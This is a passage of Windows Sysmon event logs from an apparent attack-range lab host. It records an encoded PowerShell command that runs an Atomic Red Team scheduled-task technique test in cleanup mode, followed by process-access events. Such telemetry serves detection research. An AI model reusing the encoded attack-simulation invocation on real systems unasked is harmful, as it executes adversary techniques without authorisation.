WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADUAMwAuADAAMAA1ACIAIAAtAEMAbABlAGEAbgB1AHAA","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6021,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.448\r\nSourceProcessGUID: {E2A3D6B1-11D9-5F25-0000-0010B0A70800}\r\nSourceProcessId: 1092\r\nSourceThreadId: 4108\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11D2-5F25-0000-001053D70700}\r\nTargetProcessId: 4720\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+25c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+25c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+25c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+25c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f53638(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f534ac(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97fd5cd8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f4c094(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98a05037(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f1488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f72d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f56251(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f481d6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f81366(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.448","SourceProcessGUID":"{E2A3D6B1-11D9-5F25-0000-0010B0A70800}","SourceProcessId":"1092","SourceThreadId":"4108","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11D2-5F25-0000-001053D70700}","TargetProcessId":"4720","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+25c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+25c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+25c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+25c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f53638(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f534ac(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97fd5cd8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f4c094(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98a05037(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f1488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f72d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f56251(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f481d6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f81366(wow64)","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6022,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.448\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D2-5F25-0000-001053D70700}\r\nTargetProcessId: 4720\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.448","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D2-5F25-0000-001053D70700}","TargetProcessId":"4720","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6023,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.448\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.448","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6024,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.448\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.448","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6025,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.448\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.448","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6026,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.448\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.448","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6027,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.448\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 